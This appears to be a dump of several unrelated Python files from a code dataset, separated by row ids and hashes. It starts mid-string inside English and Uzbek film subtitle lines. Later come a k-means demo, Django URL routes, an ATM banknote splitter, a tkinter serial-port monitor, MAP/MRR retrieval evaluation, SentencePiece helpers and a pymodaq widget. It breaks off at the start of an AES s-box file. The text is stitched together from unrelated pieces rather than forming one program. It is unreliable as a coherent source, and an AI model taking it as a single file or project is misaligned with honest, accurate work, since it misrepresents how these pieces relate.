yig'lab yubordi
tushdi
yonayotgan
Men qochgan yagona odam edim
sababsiz o'ldirgan erkaklar bilan mulohaza yuritib bo'lmaydi
men hali ham harakat qilaman
qolganlarni Berkga qaytaring
Menda bir kunlik qo'zg'olon bor edi
keskin harakatlar yo'q
to'xtab tur
siz mening ajdarimni o'sha erda qoldirdingiz
u cho'kib ketadi
biz ajdarimga qaytib ketishimiz kerak
ajdaho o'g'ri
Siz haqiqatan ham meni o'sha erda xavotirga solgansiz
bo'lishi mumkinmi?
bu qanday mumkin?
siz faqat go'dak edingiz
cho'chqa boshi
xuddi onasi kabi
u ham hech qachon tura olmasdi
Aytmoqchimanki, bundan ham yomon kombinatsiya bo'lishi mumkin
qachon siz o'jar va aqlsiz bo'lganingizni o'ylaganimda
qanday aqldan ozganini tushunasizmi?
tushunish
aqldan ozgan
Siz ularni qutqardingiz
aql bovar qilmaydigan
xafa bo'lmaysiz
boshimni aylantirish, ochig'ini aytganda, biroz ko'proq
vahshiy
hushyor
aqldan ozgan
hech bo'lmaganda men zerikmayman, to'g'rimi
Xo'sh, menimcha, bu aniq bir narsa
oh, aql bovar qilmas
u, ehtimol, o'z turining oxirgisi bo'lishi mumkin
ajablanarli emas, siz juda yaxshi birga bo'ldingiz
va tortiladigan tishlar
qanday boshqargansiz
yarador
Jekning qanoti ustara bilan kesilgan edi
qo'rqqan
u meni qaytarib oldi
tez orada, uyga qaytgan har bir odamning o'z ajdarlari bor edi
agar iloji bo'lsa edi
lekin odamlar o'zgarishga qodir emas
tinchlik mumkin edi
siz yomonlashtirasiz
bu juda mashhur bo'lmagan fikr edi
beshikda
Men sizni himoya qilishga shoshildim
lekin men ko'rgan hamma narsa men ishongan narsaning isboti edi
Bu yovuz hayvon emas, balki aqlli, muloyim ijod, uning ruhi mening jonimni aks ettirardi
to'xtab tur
siz va otangiz o'sha kecha deyarli vafot etdilar
chunki men ajdarni o'ldira olmadim
uzoqlashish yuragimni sindirib tashladi, lekin agar men qilsam, siz xavfsizroq bo'lishingizga ishonardim
qanday tirik qoldingiz?
Jek hech qachon menga yomonlik qilishni xohlamagan
u meni bu erga tegishli deb o'ylagan bo'lishi kerak
hali ham mavjud bo'lgan juda kam sonli kishilardan biri
g'amxo'rlik
orasida
lekin, men siz uchun yuz sochlarini o'stirdim
yashirinmoq
buni tartibga solish mumkin edi
olib kelmoq
qaytadan boshlashimiz mumkinmi?
Endi siz qattiq burilishlarni qilishingiz mumkin
bizni bog'laydi
mendan tush
bu erda isinish
arqonlarni tushiring
Dragoda ular yo'q
menga ishoning
Berk taxtining vorisi
barcha tayyorgarlikni to'xtating
erning ko'proq rivojlanish xilma -xilligi
uni faqat qoziqqa qo'shing
qoziq
siz buni olmoqchi bo'lishingiz mumkin
Men ko'p marta jangni to'xtatishni, boshqa javob topishni iltimos qildim, lekin sizlardan hech kim quloq solmadimi?
Bilaman, men senga Jekni yolg'iz tarbiyalash uchun qoldirganman, lekin u mensiz yaxshi bo'lardi deb o'ylagandim va xato qildim
men seni yo'qotgan kunim kabi go'zalsan
bu kun yomonlashishi mumkinmi?
boshqalarni ogohlantir
achinarli
har bir tuzoqni tekshiring
jim bo'lishda davom eting
endi yaxshilikni qaytarishga ijozat bering
siz buni hech qachon tan olmaysiz
yirtqich dengizlar
cho'kish qo'rquvi bilan
va hayot to'lqinlarini quvonch bilan minib
na kuygan o'g'il, na sovuq
va meni abadiy sev
mening azizim, azizim
sizning kuchli so'zlaringiz meni hayratda qoldirdi
ularni kesib tashlang
u qanday sharmandalikni his qilishi kerak
dunyoni boshqarish uchun
ular odamlarni birlashtira oladigan mehribon, ajoyib ijodkorlar
yoki ularni ajratib oling
Men qo'rquvda yashash nima ekanligini bilaman,
lekin bolaligida ham
hech narsasiz qoldi
men ajdarlardan qo'rqishdan ustun turishga va bu dunyo odamlarini ozod qilishga qasam ichdim
qutulmoq
hech bir ajdaho Alfaning buyrug'iga qarshi tura olmaydi
haqiqiy kuchga guvoh bo'ling
undan chiqib ketish
odamlarni to'plang va meni Berkda kutib oling
va men, men o'ylagan tinchlikparvar emas
siz juda yomon narsa edingiz
juda zaif, juda nozik
Men bunga erisha olmasligingizdan qo'rqardim
u hech qachon shubha qilmagan
ajdaho ruhi
Men otam bo'lishdan juda qo'rqardim ADAMGA OXSHASHDAN
asosan men hech qachon qila olmayman deb o'ylaganim uchun
qanday qilib kimgadir aylanasiz
jasur
fidoyi
O'ylaymanki, siz faqat urinib ko'rishingiz mumkin
Ba'zilar bu noto'g'ri o'ylangan deb taxmin qilishlari mumkin
mumkin emas
endi sizni hech kim himoya qila olmaydi
Men ajablantira olmaydigan tirik ajdaho yo'q
Albatta, sizdan qutulish qiyin, men aytaman
ular sizni shunday qilishga majburlashdi
kutib turing
deyarli u erda do'stim
Menga ishonasanmi?
bitta kabi
Siz meni hayratda qoldirishdan to'xtamaysiz
u erda juda yaxshi ajdaho janjallashdi
hurmatga sazovor bo'lardim
sizning otangiz, u ham men kabi faxrlanardi
siz hali ham shunday qilyapsiz
bu kulgili
biroz oyoq osti qilingan va busted va muz bilan qoplangan, lekin u uy
bizga hujum qilganlar tinimsiz va aqldan ozgan"""
b = f"""granted, it may not look like much, but this wet heap of rock pack
more than a few surprises
just not for the faint of heart
faint
you, see where most folks enjoy hobbies like whittling or needlepoint, we dragon racing prefer
folks
a little something we like to call dragon racing
it's starting to stink around here
stink
nope, still hates you.
let's blow this place
blow
scared him off with the big talk, didn't you
didn't she try to bury you alive?
only for a few hours
now, dragons used to be a bit of a problem here, but that was five years ago
and, really, why would't they
we have custom stables, all you can eat feeding stations, a full service dragon wash
even top of the line fire prevention, if i do say so myself
we can still win this thing
up
here you go, darling
except for me
quit trying to steal all my glory
always ruining everything
that's my future daughter in law
berk is pretty much perfect
all of my hard work has paid off
the world just got a whole lot bigger
you want to give this another shot
this is amazing
no longer amazing
that really came out of nowhere
we got to work on your solo gliding there
solo
gliding
locked up tail makes for some pretty sloppy rescue maneuvers
do you want an apology
is that why you're pout, big baby boo
well, try this on
oh, you feeling it yet?
picking up on all my geartfelt remorse?
and it's ugly
you know that doesn't wash out
what do you reckon
the odd whispering death or twho in the rocks
whispering
maybe we'll finally track down another Night Fury
wouldn't that be something
wouldn't something
just keep going
what else
avoiding my dad
you're gonna love this
terible terrors are singing on the rooftop
i saunter down to breakfast thinking all is right with the world, and i get
i got a whole day of goofing off to get started
that's a really flattering impersonation
you're the pride of Berk, son
i'm pretty impressed with myself, too
and since no chief could ask for a better successor
i've decided
sensitive
it's a lot of responsibility
all those speeches and planning and running the village that's his thing
i think you're missing the point
what an honor
i'd be pretty excited
i'm still looking
i know that i'm not my father
what does that make me
stay close
look out
watch the tail
tail
tie those legs up
thought they were all gone for good
looks like our luck's had a turn for the better, lads
look, we don't want any trouble
blasted
trap
sneaking
rescue
you mean other than your thieving friend from last night?
ice-spitting
but we still have a quota to fill
how do you suppose we explain this mess to drago Bludvist
does anything you say make sense?
he's expecting a new shipment of dragons for his army by tomorrow
and Drago don't take well to excuses
promised
far less
we don't know anything about a dragon thief
strange
hostile
oh, where are my manners
finest dragon trapper alive
capture
rush'em, lads
you will never hold on to those dragons
he's probably flown off the edge of the world by now
you sure want that kid running the village
you can still delay your retirement
who finally decided to show up for work
sorry, got held up
something you're itching to tell me?
uh, not quite the thing you're thinking of, but, yes
a chief first duty is to his people
well, can we just talk in private for
hey, i was ahead of you
if we could just talk
i want one of those high seaters with lots of spikes and a big storage compartment
dad, this is actually a little more important than building saddles
no task is too small when it comes to serving your people
you let the forge die down again
you're going up for adoption
have away
i really need to tell you about this neew land we came across
we didn't stick around to find out
these folks weren't particularly friendly
your Night Fury and Deadly Nadder didn't bring them
cheering to the rooftops
hills
these guys were trappers
you should have seen their fort
it was weird
and worst of all, they thought we did it
not everyone appreciates this way of life
best we keep to our own.
besides, you'll have more important uses for your time
once we make the big announcement
i'll bloody his fist with my face if he tries to take my dragon
you're such a moron
seal the gates
lower the storm doors
wait,because some guy you knew is stirring up trouble in some faraway land
because Drago Bludvist is a madman without conscience or without mercy
get them into their pens
then let's ride back out there
we fortify the island
it's our duty to keep the peace
peace is over
i must prepare you for war
mind
secure the stables
latch every stall
i have to
keep your eyes peeled, lads
with this wind, we'll reach Drago by daybreak
so best we fill this ship up with dragons, and quick
it's no time to be picky
off the port quarter
net them, lads
take them down
up on the left
and here i was, worried we might turn up empty handed
we give up
finest
that ought to make the boss happy
excuse us
the dragons don't really care for scamped spaces
they'll just hang out with you
trouble
unless you do that wooden boats how is your swimming can't have armed prisoners once they see you as one of their own, even the tastiest dragons can be trained
he can be really persuasive
once you've earned his loyalty, there is nothing a dragon won't do for you
see how well i protect and provide
what is with all the nets?
close
hold your fire
we're here to rescue you
enough
well, didn't you just pick the wrong ship
get this thing off me
that's what i figured
saddle up
of all the irresponsible
i'm trying to protect our dragons and stop a war
how is that irresponsible
there was a great gathering of chieftains to discuss the dragon scouge we all faced
into our midst came a stranger from a strange land, covered in scars and draped in a cloak of dragon skin
scars
draped
cloak
he carried no weapon and spoke softly
devoted to freeing mankind from the tyranny of dragons
we chose to bow down and follow him
we laughed too
until
cried
descended
burning
i was the only one to escape
men who kill without reason cannot be reasoned with
i'm still going to try
leak the others back to Berk
i've had enough mutiny for one day
no sudden moves
hold on
you left my dragon back there
he'll drown
we have to head back for my dragon
the dragon thief
you really had me worried there
could it be?
how is this possible?
you were only a babe
boar headed
just like his mother
she could never stay put, either
i mean, could there be a worse combination
when i think of how stubborn and senseless you were back in the day
do you grasp how insane it sounds
grasp
insane
you've been rescuing them
unbelivable
you're not upset
it's a bit much to get my head around, to be frank
feral
vigilante
crazy
at least i'm not boring, right
well, i suppose there is that one specific thing
oh, incredible
he might very well be the last of his kind
no wonder you get along so well
and retractable teeth
how did you manage
wounded
Jeck had her wing sliced by razor netting
scared
he got me back
pretty soon, everyone back home had dragons of their own
if only it were possible
but people are not capable of change
peace was possible
you'll make it worse
it was a very unpopular opinion
in the cradle
i rushed to protect you
but what i saw was proof of everything i believed
this wasn't a vicious beast, but an intelligent, gentle crearure, whose soul reflected my own
hold on
you and your father nearly died that night
all because i couldn't kill a dragon
it broke my heart to stay away, but i belived you'd be safer if i did
how did you survive
Jack never meant to harm me
he must have thought i belonged here
one of the very few that still exist
care
among
but, i grew facial hair for you
sneak
that could be arranged
fetch
can we start over?
now you can make those tight turns
it bonds us
get off me
keeping warm up here
drop the ropes
Drago doesn't have them after all
trust me
heir to the throne of Berk
stop all preparations
more of the earth shattering development variety
just add it to pile
pile
you might want to take this one
i pleaded so many times to stop the fighting, to find another answer, but did any of you listen?
i know that i left you to raise Jeck alone, but i thought he'd be better off without me, and i was wrong
you're as beautiful as the day i lost you
could this day get any worse?
warn the others
pathetic
check every trap
keep cranking
now let me return the favor
you'd never even recognize it
savage seas
with ne'er a fear of drowning
and gladly ride the waves of life
no scorching son nor freezing cold
and love me for eternity
my dearest one, my darling dear
your mighty words astound me
cut them down
what shame he must feel
to rule the world
they are kind, amazing creaturs that can bring people together
or teat them apart
i know what it is to live in fear,
but even as a boy
left with nothing
i vowed to rise above the fear of dragons and liberate the people of this world
rid
no dragon can resist the Alpha's command
witness true strength
snap out of it
gather the men and meet me at berk
and i', not the peacekeeper i thought i was
you were such a wee thing
so frail, so fragile
i feared you wouldn't make it
he never doubted
the soul of a dragon
i was so afraid of becoming my dad ADAMGA OXSHASHDAN
mostly because i thought i never could
how do you become someone
brave
selfless
i guess you can only try
some might suggest this is poorly conceived
not possible
no one can protect you now
there isn't a dragon alive that i can't wrangle
you certainly are hard to get rid of, i'll say that
they made you do it
hang on
almost there budy
do you trust me?
as one
you never cease to amaze me
that was some pretty fine dragon wrangling back there
i'd be honored
your father, he'd be every bit as proud as i am
you're still doing that one
that's hilarious
a bit trampled and busted and covered in ice, but it's home
those who attacked us are relentless and crazy"""
# Pair each English line (b) with its Uzbek translation (a) and print them
# joined by a dash.  Removed the unused accumulator `e` and the
# commented-out debug print.  Index-based iteration is kept so a length
# mismatch still raises IndexError rather than silently truncating.
a = a.split("\n")
b = b.split("\n")
SEPARATOR = "-"
for i in range(len(a)):
    print(b[i] + SEPARATOR + a[i])
|
15,639 | 47dd6bd656048f28fe58ea19921a69fac06e86fd | #!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2020/2/13 0013 11:25
# @Author : honwaii
# @Email : honwaii@126.com
# @File : k_means_model.py
import matplotlib.pyplot as plt
import random
from collections import defaultdict
from sklearn.cluster import KMeans
# 生成2-D待分类数据
def generate_clustering_data():
    """Return 1000 random 2-D points with integer coordinates in [0, 1000].

    The two coordinate lists are drawn separately (all x values first, then
    all y values) to keep the RNG call order identical to the original.
    """
    xs = [random.randint(0, 1000) for _ in range(0, 1000)]
    ys = [random.randint(0, 1000) for _ in range(0, 1000)]
    return [[x, y] for x, y in zip(xs, ys)]
def clustering(data):
    """Fit a 6-cluster KMeans model (max 1000 iterations) and return it."""
    model = KMeans(n_clusters=6, max_iter=1000)
    return model.fit(data)
def draw_graph(cluster, locations):
    """Scatter-plot each point coloured by its cluster label, plus the centers."""
    clustered_locations = defaultdict(list)
    colors = ['red', 'blue', 'orange', 'grey', 'black', 'yellow']
    # Grouping points by label and colouring them is done in a single loop
    # (no need for the two separate passes used in the course code).
    for label, location in zip(cluster.labels_, locations):
        clustered_locations[label].append(location)
        plt.scatter(*location, c=colors[label])
    # Centers get no explicit colour: matplotlib picks distinct colours
    # automatically, so they will not clash with each other.
    for center in cluster.cluster_centers_:
        plt.scatter(*center, s=100)
    plt.show()
    return
# 1. Generate the data to be clustered
clustering_data = generate_clustering_data()
# 2. Fit the clustering model on the data
cluster = clustering(clustering_data)
# 3. Draw the clustered data and the cluster centers
draw_graph(cluster, clustering_data)
|
15,640 | 089be3a1b03ff3c3d627b593c4dc37d43bab75a3 | from django.urls import path
from . import views
urlpatterns = [
    # Comments
    path('comment/', views.CreateCommentView.as_view()),
    path('comments/', views.ListCommentView.as_view()),
    path('comment/update_delete/<id>/', views.DeleteUpdateCommentView.as_view()),
    # Profiles
    path('patient/', views.PatientProfileView.as_view()),
    path('patient/public/', views.PublicPatientProfileView.as_view()),
    path('doctor/', views.DoctorProfileView.as_view()),
    path('doctor/public/', views.PublicDoctorProfileView.as_view()),
    # Saved profiles
    path('save/', views.SaveProfileView.as_view()),
    path('remove_save/<id>/', views.RemoveSavedProfileView.as_view()),
    path('is_saved/', views.IsProfileSavedView.as_view()),
    # Doctor listing / settings
    path('list_doctors/', views.ListDoctorsView.as_view()),
    path('change_visit_duration/', views.ChangeVisitDurationTimeView.as_view()),
    # Account updates (spacing after the comma normalized to match the rest)
    path('doctor/update/<str:username>/', views.UpdateDoctorProfView.as_view()),
    path('patient/update/<str:username>/', views.UpdatePatientProfView.as_view()),
    path('change_password/', views.ChangePasswordView.as_view()),
]
|
15,641 | 4a543533e7720a7beea23dfa587653ccf7d1b618 | #5 Lira ve Katı Parayı En Az Banknotla Veren Algoritma Denemesi
# Count of each banknote dispensed, indexed as [5, 10, 20, 50, 100, 200] TL.
BANKNOTLAR = [0, 0, 0, 0, 0, 0]

# Denominations from largest to smallest, paired with their BANKNOTLAR slot.
_DENOMINATIONS = [(200, 5), (100, 4), (50, 3), (20, 2), (10, 1), (5, 0)]


def BanknotSay(para):
    """Fill BANKNOTLAR with the minimal banknote counts for `para` TL.

    Prints a message and exits when `para` is not a multiple of 5 (the ATM
    only dispenses banknotes).  Returns the undispensable remainder, which
    is always 0 for valid input.

    Fix over the original: BANKNOTLAR is reset first, so repeated calls no
    longer keep stale counts from an earlier amount; the hard-coded cascade
    of if-blocks is replaced by a loop over the denomination table.
    """
    if para % 5 != 0:
        print("ATM'nin sadece banknot çıkışı olduğu için 5 TL ve katlarını verebiliyoruz.")
        exit()
    # Reset previous results (in place, so importers sharing the list see it).
    BANKNOTLAR[:] = [0] * len(BANKNOTLAR)
    for deger, indeks in _DENOMINATIONS:
        BANKNOTLAR[indeks], para = divmod(para, deger)
    return para
# Prompt for the amount, compute the breakdown, and report each banknote.
try:
    miktar = int(input("Çekmek istediğiniz miktarı giriniz (5 Tl ve katları):"))
except ValueError:
    print("Lütfen sadece rakamlardan oluşan bir sayı giriniz!")
    exit()

BanknotSay(miktar)
for indeks, deger in ((5, 200), (4, 100), (3, 50), (2, 20), (1, 10), (0, 5)):
    print(str(BANKNOTLAR[indeks]) + " Tane " + str(deger) + " Tl lik Banknot")
|
# Sum the values and print the total.  Renamed to avoid shadowing the
# built-ins `list` and `sum`, which the original clobbered.
values = [4, 2, 6]
total = 0
for value in values:
    total += value
print(total)
15,643 | e6ecaa66be766b13891a4539b34ab8d218aebf78 | import serial
import sys
import time
import tkinter as tk
root = tk.Tk()
path = "interior.jpg"
# Fix: tk.PhotoImage's first positional argument is the image *name*, not a
# file path, so the original never loaded the image.  The path must be
# passed via the `file` keyword.
background_image = tk.PhotoImage(file=path)
background_label = tk.Label(root, image=background_image)
background_label.place(x=0, y=0, relwidth=1, relheight=1)
# Full-screen window at the top-left corner.
root.geometry("{0}x{1}+0+0".format(root.winfo_screenwidth(), root.winfo_screenheight()))
# Arduino on COM3 at 9600 baud; 1 s read timeout.
ser = serial.Serial('com3', 9600, timeout=1)
def start_counter(label, label2, label3):
    """Start polling the serial port once per second and mirror the fields
    into the three labels.

    NOTE(review): assumes each serial line is three comma-separated fields
    ("temp,humidity,gas" judging by the headings below) -- an IndexError is
    raised if fewer fields arrive; confirm against the device firmware.
    """
    def update_func():
        global reading
        # Drop the trailing "\r\n" from the serial line.
        reading = ser.readline().decode('utf-8')[:-2]
        reading = str(reading)
        print(reading)
        arr = reading.split(',')
        label.config(text=str(arr[0]))
        label2.config(text=str(arr[1]))
        label3.config(text=str(arr[2]))
        # Re-schedule itself on the Tk event loop.
        label.after(1000, update_func)  # 1000ms
    # Give the serial link a moment before the first read.
    time.sleep(1)
    update_func()
root.title("Room Monitoring System")
# Static headings.  Note: chaining .place() makes `temp` None (place returns
# None), but the Label widgets stay alive as children of root.
temp = tk.Label(root, text="ROOM MONITORING SYSTEM", font=100, fg="blue").place(x=500, y=150)
temp = tk.Label(root, text="TEMPERATURE", font=40, fg="blue").place(x=100, y=300)
temp = tk.Label(root, text="HUMIDITY", font=40, fg="blue").place(x=500, y=300)
temp = tk.Label(root, text="GAS / SMOKE", font=0, fg="blue").place(x=900, y=300)
# Dynamic read-outs, refreshed by start_counter.
label = tk.Label(root, font=20, fg="red")
label.place(x=100, y=400)
label2 = tk.Label(root, font=20, fg="green")
label2.place(x=500, y=400)
label3 = tk.Label(root, font=20, fg="grey")
label3.place(x=900, y=400)
start_counter(label, label2, label3)
button = tk.Button(root, text='Stop', width=30, command=root.destroy)
button.place(x=600, y=600)
root.mainloop()
|
15,644 | ea78b12f73d189c765c715dde842bb22ac8b49d5 | import pickle
# Ground truth: qid -> container of relevant passage ids (used as qrels[qid]).
with open("data/qrels.dev.small.pkl", 'rb') as f:
    qrels = pickle.load(f)
# System output: qid -> ranked list of passage ids (used as ranks[qid][:k]).
with open("top1000.dev.sorted.ranks.pkl", 'rb') as f:
    ranks = pickle.load(f)
Q = len(qrels)
print("Total number of queries: {}".format(Q))
print("Number of queries considered: {}".format(len(ranks)))
# Calculate Mean Average Precision #
def PrecisionAtK(qid, k):
    """Fraction of the top-k ranked passages for `qid` that are relevant."""
    relevant = qrels[qid]
    retrieved = ranks[qid][:k]
    hits = sum(1 for pid in retrieved if pid in relevant)
    return hits / k
def AveragePrecision(qid):
    """Average of Precision@rank over all relevant passages of `qid`.

    Relevant passages absent from the ranking contribute 0 to the average.
    """
    relevants = qrels[qid]
    soma = 0
    for pid in relevants:
        # Narrowed from a bare `except:` so real bugs surface: only the
        # expected failures are skipped -- pid not in the ranking
        # (ValueError) or qid missing from `ranks` (KeyError).  The try
        # body is also minimized so PrecisionAtK errors are not swallowed.
        try:
            rank = ranks[qid].index(pid) + 1
        except (ValueError, KeyError):
            continue
        soma += PrecisionAtK(qid, rank)
    return soma / len(relevants)
# Mean Average Precision over all judged queries (dividing by Q, so queries
# missing from the ranking count as 0).
soma = 0
for qid in qrels:
    soma += AveragePrecision(qid)
print("MAP: {}".format(soma / Q))
# Calculate Mean Reciprocal Rank and MRR@10 #
def ReciprocalRank(qid, k):
    """Reciprocal rank of the first relevant passage within the top k, else 0."""
    relevants = qrels[qid]
    # Narrowed from a bare `except:`: only a qid missing from `ranks`
    # (KeyError) is treated as "nothing retrieved"; other errors now surface.
    try:
        pids = ranks[qid][:k]
    except KeyError:
        return 0
    for i, pid in enumerate(pids):
        if pid in relevants:
            return 1 / (i + 1)
    return 0
# Mean Reciprocal Rank over all judged queries: full depth (1000) and cutoff 10.
soma_mrr = 0
soma_mrr10 = 0
for qid in qrels:
    soma_mrr += ReciprocalRank(qid, 1000)
    soma_mrr10 += ReciprocalRank(qid, 10)
print("MRR: {}".format(soma_mrr / Q))
print("MRR@10: {}".format(soma_mrr10 / Q))
|
15,645 | 1d82a060eb4fb788aba3de69c60715846209c559 | # -*- coding: utf-8 -*-
'''
Python 2 demo: print appends a newline by default;
if the print statement ends with a comma, no newline is added.
'''
print "没有换行",
print "到我这才换行"
|
15,646 | 6c8215f80fff5bf193b2660b0cc84b7ea43db67c | # MIT License
#
# Copyright (c) 2021 Soohwan Kim and Sangchun Ha and Soyoung Cho
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sentencepiece as spm
import shutil
SENTENCEPIECE_MODEL_PREFIX = "sp"
SENTENCEPIECE_MODEL_TYPE = "bpe"
def train_sentencepiece(transcripts, vocab_size: int = 3200, blank_token: str = '<blank>') -> None:
    """Train a BPE SentencePiece model on `transcripts`.

    Writes the corpus to sentencepiece_input.txt (one transcript per line)
    and produces {SENTENCEPIECE_MODEL_PREFIX}.model/.vocab in the working
    directory.

    Args:
        transcripts: iterable of transcript strings used as the corpus.
        vocab_size: target subword vocabulary size.
        blank_token: extra user-defined symbol registered in the vocabulary.
    """
    print('generate_sentencepiece_input..')
    with open('sentencepiece_input.txt', 'w', encoding="utf-8") as f:
        for transcript in transcripts:
            f.write(f'{transcript}\n')
    # Fixed special-token ids: pad=0, bos=1, eos=2, unk=3.
    spm.SentencePieceTrainer.Train(
        f"--input=sentencepiece_input.txt "
        f"--model_prefix={SENTENCEPIECE_MODEL_PREFIX} "
        f"--vocab_size={vocab_size} "
        f"--model_type={SENTENCEPIECE_MODEL_TYPE} "
        f"--pad_id=0 "
        f"--bos_id=1 "
        f"--eos_id=2 "
        f"--unk_id=3 "
        f"--user_defined_symbols={blank_token}"
    )
def convert_subword(transcript: str, sp: spm.SentencePieceProcessor):
    """Encode `transcript` into subword pieces and their id string.

    Returns (text, label): `text` is the space-joined pieces and `label` the
    space-joined piece ids, aligned one-to-one with the pieces.
    """
    pieces = sp.EncodeAsPieces(transcript)
    text = " ".join(pieces)
    # Fix: iterate over the pieces, not over the characters of `text`.  The
    # original looked up an id per *character* (including the separating
    # spaces), producing one bogus id per character instead of per piece.
    label = " ".join(str(sp.PieceToId(piece)) for piece in pieces)
    return text, label
def sentence_to_subwords(
        audio_paths: list,
        transcripts: list,
        manifest_file_path: str,
        sp_model_path: str = "sp.model"
) -> None:
    """Write a manifest mapping each audio file to its subword transcript.

    Each manifest line is "<audio_path>\\t<text>\\t<label>" where text/label
    come from convert_subword.  If a different destination is requested, the
    trained sp.model is copied to `sp_model_path` first.
    """
    print('sentence_to_subwords...')
    if sp_model_path != f"{SENTENCEPIECE_MODEL_PREFIX}.model":
        shutil.copy(f"{SENTENCEPIECE_MODEL_PREFIX}.model", sp_model_path)
    sp = spm.SentencePieceProcessor()
    sp.Load(sp_model_path)
    with open(manifest_file_path, 'w', encoding="utf-8") as f:
        for audio_path, transcript in zip(audio_paths, transcripts):
            # NOTE(review): str.replace swaps *every* 'txt' substring in the
            # path, not just the extension -- confirm paths never contain
            # 'txt' elsewhere.
            audio_path = audio_path.replace('txt', 'pcm')
            text, label = convert_subword(transcript, sp)
            f.write(f"{audio_path}\t{text}\t{label}\n")
|
15,647 | 5576ff8ae23acdbe50e995df909f7433bbbd64ed | # -*- coding: utf-8 -*-
"""
Created the 30/01/2023
@author: Sebastien Weber
"""
from qtpy import QtWidgets, QtCore, QtSvg, QtGui
from pymodaq.daq_utils.config import Config
from pyqtgraph.widgets.SpinBox import SpinBox
config = Config()
class SpinBox(SpinBox):
    """
    In case I want to add pyqtgraph spinbox functionalities

    Thin wrapper over pyqtgraph's SpinBox (the class deliberately shadows
    the imported name): optional font size, enforced minimum height,
    read-only by default, and no up/down buttons.
    """
    def __init__(self, *args, font_size=None, min_height=20, readonly=True, **kwargs):
        super().__init__(*args, **kwargs)
        if font_size is not None:
            font = QtGui.QFont()
            font.setPointSize(font_size)
            self.setFont(font)
        self.setMinimumHeight(min_height)
        self.setReadOnly(readonly)
        # Hide the spin arrows: these boxes are display-only read-outs.
        self.setButtonSymbols(QtWidgets.QAbstractSpinBox.NoButtons)
class LabelSpinBox(QtWidgets.QWidget):
    """A labelled numeric read-out: a text label stacked above a SpinBox.

    Fixes over the original:
    * the `value` property now actually returns the spinbox value (the
      original was missing the `return`, so it always yielded None);
    * the `readonly` constructor argument is forwarded to the SpinBox
      instead of being ignored (it was hard-coded to True).
    """
    value_changed = QtCore.Signal(float)

    def __init__(self, parent: QtWidgets.QWidget, label: str, readonly: bool):
        super().__init__(parent)
        self.setLayout(QtWidgets.QVBoxLayout())
        self.label = QtWidgets.QLabel(f'{label}:')
        self.spinbox = SpinBox(self, font_size=20, readonly=readonly)
        self.spinbox.setDecimals(3)
        self.layout().addWidget(self.label)
        self.layout().addWidget(self.spinbox)
        self.setMinimumHeight(70)

    @property
    def value(self) -> float:
        """Current value shown by the spinbox."""
        return self.spinbox.value()

    @value.setter
    def value(self, value: float):
        self.spinbox.setValue(value)
class SetupSVG:
    """Overlay of live readout spinboxes positioned on top of an SVG sketch
    of the optical setup, next to a panel that can host a settings tree."""

    def __init__(self, parent_widget: QtWidgets.QWidget):
        super().__init__()
        self.parent = parent_widget
        # assumes 'setup.svg' exists in the current working directory — TODO confirm
        self.svg_widget = QtSvg.QSvgWidget('setup.svg')
        self.settings_widget = QtWidgets.QWidget()
        self.settings_widget.setLayout(QtWidgets.QVBoxLayout())
        # Readouts are children of the SVG widget so they can be moved to
        # absolute pixel positions over the drawing (see setup_ui()).
        self.tangerine_power = LabelSpinBox(self.svg_widget, 'Power', True)
        self.tangerine_rep_rate = LabelSpinBox(self.svg_widget, 'Rep. Rate', True)
        self.compressor_delay = LabelSpinBox(self.svg_widget, 'Delay Comp.', True)
        self.nopa_angle = LabelSpinBox(self.svg_widget, 'Angle', True)
        self.nopa_delay = LabelSpinBox(self.svg_widget, 'Delay NOPA', True)
        # NOTE(review): compressor_delay is not registered in _all, so
        # update('compressor_delay', ...) silently does nothing — confirm
        # whether that is intentional.
        self._all = dict(power=self.tangerine_power, rep_rate=self.tangerine_rep_rate,
                         nopa_angle=self.nopa_angle, nopa_delay=self.nopa_delay)
        self.setup_ui()

    def add_settings(self, tree):
        """Append a settings tree widget to the left-hand settings panel."""
        self.settings_widget.layout().addWidget(tree)

    def setup_ui(self):
        """Lay out the settings panel beside the fixed-size SVG view and
        place the readouts at hard-coded positions over the drawing."""
        self.parent.setLayout(QtWidgets.QHBoxLayout())
        self.svg_widget.setFixedSize(1000, 700)
        self.parent.layout().addWidget(self.settings_widget)
        self.parent.layout().addWidget(self.svg_widget)
        self.svg_widget.renderer().setAspectRatioMode(QtCore.Qt.KeepAspectRatio)
        self.parent.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed))
        # Pixel coordinates matched to the 1000x700 SVG canvas above.
        self.tangerine_power.move(350, 20)
        self.tangerine_rep_rate.move(350, 100)
        self.compressor_delay.move(700, 200)
        self.nopa_angle.move(400, 220)
        self.nopa_delay.move(150, 630)

    def update(self, id: str, value: float):
        """Push *value* into the readout registered under *id*.

        Unknown ids are silently ignored.
        """
        if id in self._all:
            self._all[id].value = value
def main(init_qt=True):
    """Build and show the setup widget.

    With ``init_qt`` true a QApplication is created and its event loop is
    entered (never returns normally); with it false — used by the test
    suite — the pair ``(prog, widget)`` is returned instead.
    """
    import sys

    app = None
    if init_qt:  # used for the test suite
        app = QtWidgets.QApplication(sys.argv)

    container = QtWidgets.QWidget()
    prog = SetupSVG(container)
    container.show()

    if init_qt:
        sys.exit(app.exec_())
    return prog, container


if __name__ == '__main__':
    main()
|
15,648 | 2dc1820f241761778c911ce45447ebc424ef2e5b | import binascii
# Standard AES s-box
# (forward SubBytes substitution table, indexed by byte value 0..255)
